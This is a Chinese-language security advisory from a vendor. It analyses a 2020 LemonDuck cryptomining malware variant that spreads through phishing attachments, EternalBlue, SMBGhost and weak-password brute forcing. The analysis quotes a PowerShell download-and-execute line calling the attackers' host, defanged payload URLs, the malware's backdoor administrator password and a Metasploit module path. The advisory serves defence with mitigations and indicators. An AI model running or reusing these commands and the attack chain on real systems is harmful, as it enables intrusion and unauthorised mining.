「安全通告」新版「LemonDuck」搭載「永恆之藍」,新增EXE攻擊模塊...

2020-12-24 亞信安全

安全通告

近日,亞信安全截獲「LemonDuck」(檸檬鴨)挖礦病毒的最新變種文件,該變種啟用Python打包可執行文件方式進行網絡攻擊,重新將永恆之藍漏洞攻擊、SMB、MSSQL爆破攻擊的代碼添加到可執行文件中,結合之前的PowerShell腳本進行混合攻擊。失陷後的系統會下載if.bin和<random>.EXE攻擊模塊進行大規模的漏洞掃描和攻擊傳播,中毒系統最終用於下載運行門羅幣挖礦木馬。

攻擊流程

病毒詳細分析

該病毒執行後自動查找當前用戶的郵箱通訊錄並發送隨機主題的郵件,郵件附件文檔名為readme.doc和readme.zip,相關代碼如下:

形成釣魚郵件如下:

其中,附件文檔附帶CVE-2017-8570漏洞,如果被攻擊用戶收到郵件並不慎打開文檔後,釋放的Package對象中的Scriptletfile(.sct)腳本文件會自動釋放到%tmp%目錄下:

插入的Package對象實際上是一個惡意Scriptletfile(.sct)腳本文件:

如果沒有更新補丁修復Scriptletfile功能,就可能觸發漏洞執行PowerShell命令執行惡意代碼。釣魚郵件另一個附件中加入了「readme.zip」,解壓後是一個惡意的JS文件「readme.js」,該JS文件開頭為「//This File is broken.」,中間被插入大段空白,惡意代碼內容在文件尾部,運行後會連結地址下載惡意腳本:http[:]//t.tr2q.com/mail.jsp

創建計劃任務下載的http[:]//t.amynx.com/a.jsp文件會下載if.bin和kr.bin以及m6.bin和m6g.in等挖礦程序:

其中攻擊模塊if.bin在smbghost_exec函數中利用從hxxp://d.ackng.com/smgh.bin下載的SMBGhost漏洞攻擊程序發起攻擊,攻擊成功後遠程執行以下shellcode:powershell IEx(New- ObjectNet.WebClient).DownLoadString(''http[:]///t.amynx.com/smgho.jsp?0.8*%computername%'')

同時,發起針對Linux的SSH爆破,掃描22埠進行探測,針對Linux系統root用戶,嘗試利用弱密碼進行爆破連接,爆破登陸成功後執行遠程命令:

然後,在攻擊後執行的Payload中添加一行代碼,負責下載和執行EXE攻擊模塊:http[:]//d.ackng.com/ode.bin

而Ode.bin文件的功能為生成4到8位字符組成的隨機字符作為文件名<隨機字符>.exe;從http[:]//167.71.87.85/20.dat地址下載文件另存為C:\Windows\Temp\<random>.exe同時創建計劃任務"\Microsoft\Windows\<隨機字符>.exe"並間隔50分鐘執行一次,如不能創建計劃任務則生成C:\Windows\Temp\tt.vbs文件,通過VBS腳本創建計劃任務「<隨機字符>.exe",達到定時啟動的目的。

通過計劃任務執行的20.dat(拷貝至C:\Windows\Temp\<random>.exe md5:ef3a4697773f84850fe1a086db8edfe0)實際上是由Python代碼打包的掃描攻擊模塊。<random>.exe中解碼出Python實現的永恆之藍漏洞攻擊代碼如下,另外還會執行$IPC、SMB、mssql弱口令爆破攻擊:

攻擊成功後執行shellcode:

1、下載和執行Powershell代碼gim.jsp;

2、修改administrator帳戶登陸密碼為k8d3j9SjfS7並激活administrator帳戶;

3、添加防火牆規則允許65529埠訪問並開啟監聽。

gim.jsp是經過加密的PowerShell代碼,首先檢測系統是否安裝了以下殺軟,如有調用卸載程序進行卸載:

然後安裝一個計劃任務「blackball」和一個隨機名計劃任務,定期下載和執行a.jsp繼續下載和執行挖礦和攻擊模塊:

同時會將「永恆之藍」下載器歷史版本安裝的計劃任務「Rtsa」、「Rtsa1」、「Rtsa2」刪除,封閉445和135埠,添加防火牆規則允許訪問和監聽65529埠並禁止SMB的壓縮功能:

亞信安全教你如何防範

不要點擊或打開來源不明的郵件、附件以及郵件中的連結;採用高強度的密碼,避免使用弱口令密碼,並定期更換密碼;打開系統自動更新,並檢測更新進行安裝;針對使用445埠的業務,進行權限限制;保持安全產品的部署及相關組件的更新;如無需使用,禁用PowerShell功能;系統打上MS17-010對應的Microsoft Windows SMB伺服器安全更新(4013389)補丁程序詳細信息,參考連結:https://technet.microsoft.com/library/security/MS17-010 XP和部分伺服器版WindowsServer2003特別安全補丁,詳細信息請參考連結:https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/系統打上CVE-2019-0708 RDP服務遠程代碼執行漏洞補丁:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708系統打上CVE-2017-8464 LNK遠程執行代碼漏洞補丁:https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2017-8464建議安裝如下補丁防止Mimikatz竊取本機密碼:https://support.microsoft.com/zh-cn/help/2871997/microsoft-security-advisory-update-to-improve- credentials-protection-a

亞信安全產品解決方案

拿到樣本的第一時間,亞信安全DDAN沙盒平臺已經可以檢測出惡意行為:

亞信安全病毒碼版本16.103.60,雲病毒碼版本16.103.71,全球碼版本16.103.00已經可以檢測,請用戶及時升級病毒碼版本。

亞信安全OSCE VP / DS DPI 開啟以下規則攔截該漏洞:

1008225 - Microsoft Windows SMB Remote Code Execution Vulnerability (CVE-2017-0145)1008227 - Microsoft Windows SMB Information Disclosure Vulnerability (CVE-2017-0147)1008228 - Microsoft Windows SMB Remote Code Execution Vulnerability (CVE-2017-0148)1008306 - Microsoft Windows SMB Remote Code Execution Vulnerability (MS17-010)1008585 - Microsoft Windows LNK Remote Code Execution Over SMB (CVE-2017-8464) 1008623-Microsoft Office Remote Code Execution Vulnerability (CVE-2017-8570)1009749 - Microsoft Windows Remote Desktop Services Remote Code Execution Vulnerability (CVE- 2019-0708)1008224 - Microsoft Windows SMB Remote Code Execution Vulnerabilities (CVE-2017-0144 and CVE- 2017-0146)

亞信安全深度發現設備TDA檢測規則如下:

2383:CVE-2017-0144-Remote Code Execution-SMB(Request)

亞信安全DeepEdge已發布針對CVE-2017-0144漏洞的4條規則:

名稱:微軟MS17 010 SMB 遠程代碼執行1-4,規則號:1133635,1133636,1133637,1133638

IOCs

URL:

hxxp[:]//d.ackng.com/if.bin

hxxp[:]//d.ackng.com/kr.bin

hxxp[:]//t.amynx.com/a.jsp

hxxp[:]//167.71.87.85/20.dat

hxxp[:]//d.ackng.com/ode.bin

hxxp[:]//t.amynx.com/gim.jsp

hxxp[:]//t.amynx.com/smgho.jsp

相關焦點

  • 永恆之藍下載器木馬升級更新沒完沒了,新增無文件攻擊
    雷鋒網消息,3月8日騰訊御見威脅情報中心發現曾利用驅動人生公司升級渠道的永恆之藍下載器木馬再次更新。此次更新仍然在於攻擊模塊,但是其特點在於,攻擊模塊不再由此前植入的母體PE文件進行釋放,而是轉為由感染後機器上安裝的Powershell後門進行下載。
  • 使用msf–永恆之藍攻擊模塊windows2008 R2 虛機
    說明主機存在漏洞  如圖說明192.168.29.129這臺主機存在永恆之藍漏洞。  攻擊過程  如圖啟動了攻擊,對參數做以下說明:  use exploit/windows/smb/ms17_010_eternalblue //使用永恆之藍攻擊模塊
  • 騰訊安全:永恆之藍下載器木馬再添BlueKeep漏洞攻擊,多系統版本均...
    近日,騰訊安全御見威脅情報中心監測發現,「永恆之藍下載器」木馬再次更新,新增了BlueKeep漏洞CVE-2019-0708檢測利用功能,影響Windows 7、XP、Server 2003、2008等多個系統版本。鑑於該漏洞危害影響極大,可形成類似WannaCry蠕蟲式漏洞傳播,騰訊安全建議企業用戶及時安裝相關補丁,並啟用安全軟體防禦攻擊,避免進一步造成重大安全事故。
  • 「安全通告」雙平臺被感染!WMI無文件挖礦變種病毒新增SSH爆破
    安全通告近日,亞信安全監測到WMI無文件挖礦病毒變種文件,此次變種的無文件攻擊模塊新增SSH爆破功能,攻擊Linux系統,實現雙平臺挖礦,本文對此病毒進行詳細分析並給出防禦建議。攻擊流程病毒詳細分析通過對該病毒的詳細分析,安全研究人員發現其僅會在64位系統上執行挖礦,而32位系統僅包含橫向傳播模塊,本文研究人員主要針對64位腳本進行詳細分析。
  • 永恆之藍下載器木馬再添BlueKeep漏洞攻擊,多系統版本受影響
    近日,騰訊安全御見威脅情報中心監測發現,「永恆之藍下載器」木馬再次更新,新增了BlueKeep漏洞CVE-2019-0708檢測利用功能,影響Windows 7、XP、Server 2003、2008等多個系統版本。
  • 永恆之藍下載器木馬新增BlueKeep漏洞檢測代碼,未修複比例...
    永恆之藍下載器木馬新增BlueKeep漏洞檢測代碼,未修複比例高達近30% 近日,騰訊安全御見威脅情報中心監測發現,「永恆之藍下載器」木馬再次更新,新增了BlueKeep漏洞CVE-2019-0708檢測利用功能
  • 蠕蟲病毒bulehero利用「永恆之藍」在企業內網攻擊傳播
    自2017年5月「WannaCry」勒索病毒在全球肆虐以來,「永恆之藍」漏洞攻擊事件層出不窮。近日,騰訊智慧安全御見威脅情報中心感知多起伺服器被入侵挖礦事件,發現蠕蟲病毒bulehero不僅使用弱口令爆破進行挖礦,而且還利用「永恆之藍」等多個伺服器組件漏洞發起攻擊,短時間在內網即可完成橫向擴張,給網絡安全造成了極大的威脅。安全技術專家分析發現,該木馬病毒與近期流行的「WannaCry」勒索病毒採用了類似的傳播方式。
  • 利用「永恆之藍」漏洞挖礦 「微笑」木馬半年輕鬆賺百萬
    2017年5月,利用「永恆之藍」漏洞傳播的「WannaCry」勒索病毒肆虐,席捲全球150多個國家,給全球經濟帶來巨大損失。時隔一年,雖然「WannaCry」已經被打敗,「永恆之藍」漏洞卻餘威尚在,關於企事業單位因未安裝補丁或部署該漏洞的防護類措施而中招的消息頻頻傳出。
  • 「永恆之藍」WannaCry勒索病毒分析報告
    「永恆之藍」WannaCry勒索病毒分析報告 2017-05-13    WannaCry勒索病毒 通過windows作業系統漏洞EternalBlue永恆之藍 發起攻擊。3月14 微軟已經發布補丁,由於很多受害者沒有及時安裝補丁,導致被病毒攻擊,計算機中的文件被加密。 一.
  • 360截獲新型挖礦木馬 搭載「永恆之藍」攻擊量超百萬
    近日,360安全衛士截獲一款利用「永恆之藍」傳播的門羅幣挖礦木馬,由於搭載了重磅攻擊彈藥,該木馬傳播量龐大,高峰時每天達10萬次,360近期攔截到的攻擊更達超百萬次。據了解,這是挖礦木馬攜帶「永恆之藍」針對普通網民實施的一次大規模攻擊,為防止電腦成為黑客挖礦苦力,360提醒網民確保打好補丁免疫各類利用「永恆之藍」的攻擊,同時開啟360安全衛士全面防禦各類挖礦木馬。
  • 通過永恆之藍漏洞感染15萬臺主機,對於新型挖礦病毒WnSrvMiner的...
    近日,出現一種通過永恆之藍漏洞的新型病毒(WmSrvMiner)。該病毒通過感染主機設備進行挖礦,主要表現為異常卡頓,嚴重影響主機性能和業務正常運行。目前,據第三方機構推測,感染主機數量超過15萬。請各重點單位注意加強主機設備安全防護,提醒職工不點擊來源不明的郵件以及附件,預防感染該病毒。
  • Win10新漏洞被稱「永恆之黑」 危害不亞於「永恆之藍」
    北京時間3月12日晚,微軟發布安全公告披露了一個最新的SMB遠程代碼執行漏洞(CVE-2020-0796),攻擊者利用該漏洞無須權限即可實現遠程代碼執行,一旦被成功利用,其危害不亞於永恆之藍,全球10萬臺伺服器或成首輪攻擊目標。
  • 永恆之藍WannaCry詳細分析報告
    一、背景介紹WannaCry勒索病毒 通過windows作業系統漏洞EternalBlue永恆之藍 發起攻擊。3月14 微軟已經發布補丁,由於很多受害者沒有及時安裝補丁,導致被病毒攻擊,計算機中的文件被加密。
  • 永恆之藍下載器木馬再度升級,新增「疫情」釣魚郵件傳播能力
    日前,騰訊安全威脅情報中心檢測發現,永恆之藍下載器木馬再度升級,新增郵件蠕蟲傳播能力,木馬在中招用戶機器上運行後,會自動向其通訊錄聯繫人發起二次攻擊,危害極大,目前已有大量知名企業被感染。騰訊安全提醒企業注意防範,及時安裝相關補丁,並啟用安全軟體防禦攻擊,避免重大安全事故發生。
  • 另一惡意程序利用永恆之藍攻擊卻阻斷445埠
    近期,WannaCry勒索病毒把整個網際網路攪得天翻地覆,利用美國NSA洩露的永恆之藍漏洞大肆傳播。但騰訊電腦管家檢測到,在該病毒傳播的同時,還有一個惡意程序同樣在利用該漏洞進行傳播。因該惡意程序會阻斷受害電腦的445埠的網絡連接,故一定程度上阻止了WannaCry病毒的大肆傳播。目前,騰訊電腦管家已可攔截該攻擊,用戶不必驚慌。
  • 撒旦(Satan)勒索病毒再升級 僅修復「永恆之藍」漏洞已不能防禦
    2個月前,騰訊企業安全曾預警撒旦(Satan)勒索病毒利用「永恆之藍」漏洞襲擊企業伺服器資料庫。在被安全軟體封殺後,撒旦(Satan)勒索病毒賊心不改再次升級,新增4種以上新漏洞攻擊模塊,感染擴散能力更強,對企業資料庫文件安全造成嚴重威脅。
  • 永恆之藍洩漏,酒店網絡還安全嗎?
    美國國家安全局(NSA)洩漏的危險漏洞永恆之藍(Eternalblue)成了不法分子的大禮包。據火眼(FireEye)的安全研究人員報告,俄羅斯黑客組織奇幻熊(Fancy Bear)也一直在利用永恆之藍漏洞。勒索病毒WannaCry 和NotPetya攻擊酒店無線網的殺手鐧也正是永恆之藍。
  • 「永恆之藍」死灰復燃:1.5萬臺伺服器變礦機
    2017年5月,「永恆之藍」席捲全球,有90個國家遭到攻擊,國內教育網是遭到攻擊的重災區,大量校園網用戶成為攻擊目標,致使許多實驗數據及畢業設計被鎖。近日,騰訊安全威脅情報中心檢測到永恆之藍下載器木馬再次出現新變種,此次變種利用Python打包EXE可執行文件進行攻擊,該組織曾在2018年底使用過類似手法。騰訊安全大數據監測數據顯示,永恆之藍下載器最新變種出現之後便迅速傳播,目前已感染約1.5萬臺伺服器,中毒系統最終用於下載運行門羅幣挖礦木馬。
  • Linux曝出Samba安全漏洞 類似永恆之藍
    【中關村在線新聞資訊】5月27日消息:之前「永恆之藍」讓全世界的Windows系統都如臨大敵,這讓Linux和macOS的用戶開始嘲笑Windows的安全性,然而蒼天饒過誰,現在Linux也面臨著新的安全危機。  據悉,安全公司在昨日緊急發布了Samba遠程代碼執行漏洞警報。
  • 從永恆之藍到勒索病毒大爆發
    2017年3月14日,白色情人節這天,微軟發布了編號為MS17-010的Windows SMB伺服器安全更新。該更新修復了攻擊者可通過向SMB v1伺服器發送特定消息實現遠程代碼執行的漏洞。而我們的技術團隊在之後也對該漏洞進行了技術分析——《NSA Eternalblue SMB 漏洞分析》。